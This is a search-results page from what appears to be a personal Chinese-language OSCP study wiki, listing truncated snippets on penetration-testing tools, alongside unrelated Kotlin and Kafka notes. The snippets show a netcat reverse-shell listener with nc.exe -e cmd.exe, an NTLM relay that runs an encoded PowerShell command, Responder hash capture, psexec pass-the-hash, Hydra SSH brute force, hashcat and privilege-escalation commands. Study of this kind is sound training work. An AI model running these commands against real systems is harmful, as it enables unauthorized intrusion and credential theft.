跳到主內容
進階搜尋
搜尋字串
內容類型

精確符合
標籤搜尋
日期選項
在此之後更新
在此之前更新
在此之後建立
在此之前建立

搜尋結果

找到了 578 個結果

【SQL_injection】github

【Treeman】OSCP 【OSCP】Tools

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-command-execution

【反向 shell】

【Treeman】OSCP 【OSCP】課程筆記

https://gchq.github.io/CyberChef https://www.online-python.com/ Online - Reverse Shell Generator (revshells.com) # kali 開啟 443 listener nc -nvlp 443 window # 一旦監聽器正在運行,我們將再次使用Web殼在MULTISERVER03上執行`nc.exe`, # 並使用`-e`參數在連接建立後執行`cmd.exe`。 C:\Windows\Temp\...

【Kotlin】集合 Iterable/Collection/List/Set/Map

【Treeman】Java相關 Kotlin

出處 : https://blog.csdn.net/vitaviva/article/details/107587134 建立集合  不可變更集合 immutable import java.util.* import java.text.SimpleDateFormat /** * You can edit, run, and share this code. * play.kotlinlang.org */ fun main() { val list = listOf(1...

【密碼】【破解】hashcat

【Treeman】OSCP 【OSCP】Tools

https://hashcat.net/hashcat/ hashCode 範例 https://hashcat.net/wiki/doku.php?id=example_hashes # 常用id # Kerberos(AS-REP) 18200 kali@kali:~$ hashcat --help | grep -i "Kerberos" 19600 | Kerberos 5, etype 17, TGS-REP | Network ...

【terminal】【impacket】psexec

【Treeman】OSCP 【OSCP】Tools

要執行 psexec,我們可以輸入 impacket-psexec 並帶有兩個參數。第一個參數是 -hashes,它允許我們使用 NTLM 雜湊來對目標進行身份驗證。格式為 "LMHash:NTHash",其中我們在冒號後指定 Administrator 的 NTLM 雜湊。由於我們只使用 NTLM 雜湊,因此 LMHash 部分可以填充為 32 個 0。 第二個參數是目標定義,格式為 "username@ip"。 在命令的末尾,我們可以指定另一個參數,用於確定 psexec 應在目標系統上執行哪個命令。如果我...

【SMB】【Net-NTLMv2雜湊監聽】Responder

【Treeman】OSCP 【OSCP】Tools

  現在讓我們進行這個過程。首先,我們需要運行ip a以檢索所有接口的列表。然後,我們將以sudo運行Responder(在Kali上已經預安裝),以啟用處理各種協議的特權原始套接字操作所需的權限。我們將使用-I設置監聽接口,請注意您的接口名稱可能與此處顯示的不同。 kali@kali:~$ ip a ... 3: tap0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen ...

【shell】【impacket】ntlmrelayx

【Treeman】OSCP 【OSCP】Tools

  # --no-http-server來停用HTTP伺服器,因為我們正在中繼SMB連接 # -smb2support添加對SMB2.3的支援。 # -t將目標設定為FILES02。 # -c設定我們要在目標系統上作為中繼用戶執行的命令 kali@kali:~$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 \ -c "powershell -enc JABjAGwAaQBlAG4AdA..." Impacke...

kafka connect

【Treeman】總覽 Kafka

  架設Kafka與Kafka Connect讓訊息自動同步至MongoDB connect 說明 https://docs.confluent.io/platform/current/connect/index.html#connectors 下載 sink https://www.confluent.io/product/connectors/?_ga=2.24281594.1343452646.1705657587-1925276915.1697595506&_gl=1*1ibzdsy*_ga*MT...

【Linux】【列舉】常用命令

【Treeman】OSCP 【OSCP】課程筆記

# 尋找當前用戶可寫目錄 oe@debian-privesc:~$ find / -writable -type d 2>/dev/null .. /home/joe /home/joe/Videos /home/joe/Templates /home/joe/.local /home/joe/.local/share # 搜索帶有 SUID 位設置的文件(-type f,-perm -u=s) # -perm 權限搜索 -u UID joe@debian-privesc:~$ find / ...

【總覽】Tools

【Treeman】OSCP

常用網站 提權 g0tmi1k(Linux 提權) gtgobins (提權查詢) echo 'exec "/bin/bash"' > app.rb 編碼 CyberChef (編碼) programiz (pyhon onlin ide)re 寫作 markdowntohtml.com (markdown to html) reverse shell Online - Reverse Shell Generator (revshells.com) rm /t...

【列舉】【提權】【Linux】unix-privesc-check

【Treeman】OSCP 【OSCP】Tools

/usr/bin/unix-privesc-check kali@kali:~$ unix-privesc-check unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check ) Usage: unix-privesc-check { standard | detailed } "standard" mode: Speed-optimised check of lots of security setti...

【密碼】【字典】crunch

【Treeman】OSCP 【OSCP】Tools

字典生成 # 最小和最大長度設置為 6 個字符 # 使用 -t 參數指定模式,然後將前三個字符硬編碼為 "Lab",後跟三位數字。 kali@kali:~$ crunch 6 6 -t Lab%%% > wordlist   然後,我們可以驗證生成的單詞列表的內容: kali@kali:~$ cat wordlist Lab000 Lab001 Lab002 Lab003 Lab004 Lab005 Lab006 Lab007 Lab008 Lab009 ...

【破解】【SSH】Hydra

【Treeman】OSCP 【OSCP】Tools

  # hydra -l {user} -P {password字典} {ip} -t 4 ssh -V kali@kali:~$ hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal p...

【列舉】【shell】getcap

【Treeman】OSCP 【OSCP】Tools

https://feichashao.com/capabilities_basic/ # 尋找設置uid檔案 joe@debian-privesc:~$ /usr/sbin/getcap -r / 2>/dev/null /usr/bin/ping = cap_net_raw+ep /usr/bin/perl = cap_setuid+ep /usr/bin/perl5.28.1 = cap_setuid+ep /usr/bin/gnome-keyring-daemon = cap_ipc_lock+e...

【port forwarding】socat

【Treeman】OSCP 【OSCP】Tools

們將啟動一個詳細模式的(-ddd) Socat 進程。它將在 TCP 埠 2345 上監聽(TCP-LISTEN:2345),在收到連接時分叉為一個新的子進程(fork),而不是在單個連接後死亡,然後將收到的所有流量轉發到 PGDATABASE01 的 TCP 埠 5432(TCP:10.4.50.215:5432)。 # socat -ddd TCP-LISTEN:{src_port},fork TCP:{dist_ip}:{dist_port} confluence@confluence01$ socat ...

【port forwarding】rinetd

【Treeman】OSCP 【OSCP】Tools

https://github.com/samhocevar/rinetd rinetd 是一個簡單的 TCP 端口轉發工具,它可以將進入的 TCP 連接重定向到指定的目標 IP 地址和端口。以下是 rinetd 的基本使用方式: 安裝 rinetd: 在大多數 Linux 系統上,你可以使用包管理器進行安裝。例如,在基於 Debian/Ubuntu 的系統上,可以運行: sudo apt-get install rinetd 在基於 Red Hat/CentOS 的系統上,可以使用 yum: s...

【port forwarding】proxychains

【Treeman】OSCP 【OSCP】Tools

kali@kali:~$ tail /etc/proxychains4.conf 配置了Proxychains後,現在我們可以使用我們Kali機器上的smbclient列出HRSHARES上的可用共享。與其連接到CONFLUENCE01上的埠口,我們將撰寫smbclient命令,就好像我們直接連接到PGDATABASE01一樣。與之前一樣,我們將使用-L指定列出可用共享,使用-U傳遞用戶名,並使用--password傳遞密碼。 接下來,我們只需在命令前添加proxychains。Proxychains將讀取...

【port forwarding】sshuttle

【Treeman】OSCP 【OSCP】Tools

然而,它需要在SSH客戶端上具有root權限並在SSH伺服器上使用Python3,因此它並非始終是最輕量級的選擇。 # kali -> vm1 (192.168.50.63 | 10.4.50.63) -> vm2(10.4.50.215|172.16.50.215) -> vm3(172.16.50.217) # vm1(192.168.59.63):2222 -> vm2(10.4.50.215):22 socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22 # ...